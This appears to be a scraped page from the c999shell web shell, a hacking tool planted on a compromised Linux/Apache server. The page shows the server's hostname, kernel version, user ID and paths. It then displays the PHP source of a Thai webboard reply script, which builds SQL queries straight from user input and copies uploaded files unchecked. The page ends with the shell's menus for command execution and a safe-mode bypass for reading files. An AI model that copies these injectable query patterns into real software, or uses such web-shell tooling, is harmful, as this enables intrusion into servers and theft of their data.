Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage_22222/webboard/ drwxr-xr-x |
Viewing file: Select action/file-type: include("config.inc.php"); include("function.php"); @session_start(); if ($_SESSION['AntiSpamImage'] != $_REQUEST['antispamcode']){ echo "
" , $Msg ) ; //สำหรับเปลี่ยนอักขระที่กำหนด ให้เป็นแทก html ต่างๆ $Msg = eregi_replace ( "\[b\]", " " , $Msg ) ; $Msg = eregi_replace ( "\[/b\]", " " , $Msg ) ; $Msg = eregi_replace ( "\[i\]", " " , $Msg ) ; $Msg = eregi_replace ( "\[/i\]", " " , $Msg ) ; $Msg = eregi_replace ( "\[u\]", " " , $Msg ) ; $Msg = eregi_replace ( "\[/u\]", " " , $Msg ) ; $Msg = eregi_replace ( "\[sup\]", " " , $Msg ) ; $Msg = eregi_replace ( "\[/sup\]", " " , $Msg ) ; $Msg = eregi_replace ( "\[sub\]", " " , $Msg ) ; $Msg = eregi_replace ( "\[/sub\]", " " , $Msg ) ; $Msg = eregi_replace ( "\[glow\]"," ",$Msg ); $Msg = eregi_replace("(^|[>[:space:]\n])([[:alnum:]]+)://([^[:space:]]*)([[:alnum:]#?/&=])([<[:space:]\n]|$)","\\2://\\3\\4", $Msg ); $Msg = eregi_replace("([[:alnum:]]+)@([^[:space:]]*)([[:alnum:]])([<[:space:]\n]|$)","\\1@\\2\\3", $Msg ); // ตรวจสอบว่าเป็นสมาชิกหรือไม่ mysql_connect($host,$user,$passwd); mysql_query("SET NAMES 'tis620'"); $sql = "select User,Password,Email from webboard_member where User='$MsgBy'"; $result = mysql_db_query($dbname,$sql); $NRow = mysql_num_rows($result); $row = mysql_fetch_array($result); // ตรวจสอบว่า Password ถูกหรือไม่ if($MsgBy==$row["User"] && $QPass==$row["Password"]) { $Member = 1; if(!$Email) { $Email = $row["Email"]; } } // บันทึกรูปภาพ if(($Msg =='')&&($QName=='')) { echo "
"; exit(); } copy ($QPic , "$path/" . $filename ); } } else { echo "
"; } // ปรับเวลาให้ตรงกับเวลาเมืองไทย กรณีที่ server อยู่ที่เมืองนอก //$mdate = date("Y-m-d H:i:s"); setlocale (LC_TIME, $locale); $mdate= strftime("%Y-%m-%d %H:%M:%S"); //$mdate= strftime("%Y-%m-%d %X"); //echo "$mdate "; // ตรวจสอบว่าเป็นสมาชิกหรือไม่ mysql_connect($host,$user,$passwd); mysql_query("SET NAMES 'tis620'"); $sqlr = "select User,Password,Email from webboard_member where User='$MsgBy'"; $resultr = mysql_db_query($dbname,$sqlr); $NRowr = mysql_num_rows($resultr); $rowr = mysql_fetch_array($resultr); // ตรวจสอบว่า Password ถูกหรือไม่ if($MsgBy==$rowr["User"] && $QPass==$rowr["Password"]) { $Memberr = 1; if(!$QEmail) { $QEmail = $rowr["Email"]; } }else { $Memberr = 0; } // บันทึกข้อมูลลง database $sql1 = "INSERT INTO webboard_ans (QuestionNo, Name,Namer, Member, IP, Email, Msg, Date,nphoto) VALUES ('$No','$MsgBy', '$MsgBy', '$Member', '$IP', '$Email', '$Msg', '$mdate','$filename')"; $sql2 = "UPDATE webboard_data SET Reply=Reply+1, ReplyDate='$mdate',Namer='$MsgBy',Memberr='$Memberr' WHERE No='$No'"; //$sql3 = "insert into webboard_data (Memberr) values ('$Memberr')"; mysql_query("update webboard_ans set Namer='$MsgBy' where No='$No'"); //mysql_query("update webboard_data set Namer='$Namer' where No='$No'"); $result1 = mysql_db_query($dbname,$sql1); $result2 = mysql_db_query($dbname,$sql2); if(!$result1) { echo "Error : Can not save to database"; exit(); } if(!$result2) { echo "Error : Can not update to database"; exit(); } $ShowNo = sprintf("%05d",$No); mysql_close(); ?>
เราจะพาคุณกลับไปสู่ Webboard คำถามที่ echo $ShowNo; ?> โดยไม่ต้องกดปุ่มใดๆ |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0058 ]-- |